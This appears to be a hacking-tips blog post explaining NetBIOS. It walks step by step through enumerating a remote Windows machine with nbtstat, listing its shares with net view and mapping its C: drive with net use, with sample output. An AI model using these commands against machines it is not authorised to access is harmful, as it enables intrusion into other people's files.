Techol - Latest Tips, Tricks, News and Productive Hacks

Includes Latest Tips, Tricks, News and Productive Hacks that you like to know.

Categories

FriendFeed

Follow Us

Subscribe In a Reader Follow Me on Twitter Follow My SMS

Enter your email address:

 Subscribe in a reader

Donation

Followers

NetBIOS stands for "Network Basic Input Output System".
It was originally developed by IBM and Sytek as an Application Programming Interface (API) for client software to access LAN resources.
By default it runs on port 139.
NetBIOS gives the various information of the computers on a network, which includes computer name, username, domain, group, and many others.....!

The NBTSTAT Command :-
NBTSTAT is the command for manually interact with NetBIOS Over TCP/IP.
All the attributes (switches) used with nbtstat command and their usage can be viewed.
At the command prompt type-

C:\Windows>nbtstat

Sample NBTSTAT Response :-

C:\>nbtstat -A 117.200.160.174

NetBIOS Remote Machine Name Table

Name TypeStatus
----------------------------------------------
PRASANNA<00>UNIQUERegistered
INSECURE LABS<00>GROUPRegistered
PRASANNA<03>UNIQUERegistered
PRASANNA<20>UNIQUERegistered
INSECURE LABS<1e>GROUPRegistered

MAC Address = 86-95-55-50-00-00


An intruder could use the output from an nbtstat against your machines to begin gathering information about them.

"<03> in above table is nothing but the username of that system."

The next step for an intruder would be to try and list the open shares on the given computer, using the net view command.
Here is an example of the Net View command-

C:\>net view \\117.200.160.174
Shared resources at \\117.200.160.174

Sharename Type Comment
----------------------------------------
CDiskDrive C:\
MySoftsDiskMy Softwares Collection
EDiskDrive E:\

The command was completed successfully.


This information would give the intruder a list of shares which he would then use in conjunction with the Net Use command, a command used to enable a computer to map a share to it’s local drive, below is an example of how an intruder would map the C Share to a local G: drive, which he could then browse...!

C:\>net use G: \\117.200.160.174\C
The command was completed successfully.

C:\>G:

G:\>

Related Posts with Thumbnails

0 comments

Post a Comment


Can't find what You're looking for? Try Google Search.

Translation by Google

Popular Posts

Recent Posts

Earn Money By Blog Reviews

PayPerPost
ss_blog_claim=912fac891e81c0039da80c7868c8006f ss_blog_claim=912fac891e81c0039da80c7868c8006f